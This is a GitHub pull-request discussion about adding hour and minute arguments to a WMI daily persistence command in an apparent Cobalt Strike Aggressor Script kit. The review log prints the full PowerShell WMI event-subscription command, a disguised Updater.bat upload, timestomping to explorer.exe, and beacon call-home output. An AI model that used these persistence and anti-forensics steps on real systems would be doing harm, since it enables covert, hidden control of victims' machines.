### PR TITLE
Added arg6 and arg7 to addWMIDaily() for finer control on persistence

### PR DESCRIPTION
**Pull request by tophertimzen**
I felt the need to change the Hour and Minute for the daily WMI service command. This provides finer grained control on engagements without the need to manually edit the Aggressor Script.

### CODE REVIEW

**Comment by andrewchiles** [comment]
This is a worthwhile feature add, but the help guidance should modified to indicate that the "payload/task name" argument is mandatory. If a user doesn't specify their own payload name for this function then the parsing of the hour and minute arguments will fail. This is how the help menu should read for the code to operate as intended:

```*WMI Daily [payload / task name] <Hour> <Minute>```

As is, if you execute the following command you'll end up with a task named "8" and the default start time of 1300:

```persistence Add WMI Daily 08 00```

**Comment by tophertimzen** [comment]
Agreed that payload/task name should be mandatory the way it is now implemented. Do you feel that is a good approach considering the others have it as an optional argument? It might be better to have $7 for this function be the name such as the case with the way "SchTasks OnTime" operates to keep it an optional argument should the user not want to name the task name.

**Comment by andrewchiles** [comment]
Yeah something like ```*WMI Daily [HH] [MM] <payload / task name>``` would also work now that I relooked at the SchTasks OnTime function you mentioned. Therefore, require a time be specified and remove the code that sets a default time of 1300. You're right that you'd probably want to specify your own start time in most cases so this is a good option.

**Comment by tophertimzen** [comment]
Hour and Minute are now required arguments for addWMIDaily() with the restructured argument order.

**Comment by andrewchiles** [comment]
Looks good to me!

**Comment by andrewchiles** [comment]
Testing on Windows 7/10 shows the logic still needs a little tweaking to ensure a value is supplied for the hour and minute arguments. Here's what I get when I run the script without specifying a time or taskname. Notice the hour and minute within the Query are set to '' or blank. This doesn't throw any errors, but I doubt the event would ever fire and the user could easily miss this.

```
beacon> persistence Add WMI Daily
[*] Tasked beacon to run: $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='Updater';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour ='' AND TargetInstance.Minute ='' GROUP WITHIN 60"};$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name='Updater';ExecutablePath='C:\Windows\System32\Updater.bat';CommandLineTemplate ='C:\Windows\System32\Updater.bat'};Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer};
beacon> Persisting listener: rev_http
beacon> Attempting to upload persistence file: C:\Windows\System32\Updater.bat
[*] Tasked beacon to upload C:\Windows\System32\Updater.bat as C:\Windows\System32\Updater.bat
beacon> timestomp C:\Windows\System32\Updater.bat explorer.exe
[*] Tasked beacon to timestomp C:\Windows\System32\Updater.bat to C:\Windows\explorer.exe
[+] host called home, sent: 6988 bytes
[+] received output:
#< CLIXML


__GENUS                 : 2
__CLASS                 : __FilterToConsumerBinding
__SUPERCLASS            : __IndicationRelated
__DYNASTY               : __SystemClass
__RELPATH               : __FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name=\"Updater\"",Filter="__Even
                          tFilter.Name=\"Updater\""
__PROPERTY_COUNT        : 7
__DERIVATION            : {__IndicationRelated, __SystemClass}
__SERVER                : MSEDGEWIN10
__NAMESPACE             : ROOT\subscription
__PATH                  : \\MSEDGEWIN10\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.
                          Name=\"Updater\"",Filter="__EventFilter.Name=\"Updater\""
Consumer                : CommandLineEventConsumer.Name="Updater"
CreatorSID              : {1, 5, 0, 0...}
DeliverSynchronously    : False
DeliveryQoS             : 
Filter                  : __EventFilter.Name="Updater"
MaintainSecurityContext : False
SlowDownProviders       : False
PSComputerName          : MSEDGEWIN10



<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>```

**Comment by tophertimzen** [comment]
Doh, because I am erroring out after the check for $6, not for $5.

**Comment by tophertimzen** [comment]
Okay, all is good now. I see the pain of aggressor scripting now. Kudos to the blog post you had made on this topic for the inspiration to play around with this :)
```


beacon> persistence Add WMI Daily

[-] Specify Hour, Minute

beacon> persistence Add WMI Daily 1

[-] Specify Hour, Minute

beacon> persistence Add WMI Daily 1 1

[*] Tasked beacon to run: $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments
```

**Comment by ZonkSec** [comment]
Thanks @andrewchiles for doing all the testing and vetting!

And no problem @tophertimzen! Happy to see someone benefit from my blog. This is a good feature add, so thank you!

**Review by andrewchiles — APPROVED** [review]

**Comment by andrewchiles** [comment]
Yes @tophertimzen, there is definitely pain involved in learning the nuances of sleep/aggressor scripting, but they're so useful once you get them to function as intended. Your improvements are now merged. Please feel free to propose new features or submit additional Pull requests!

**Pull request merged**
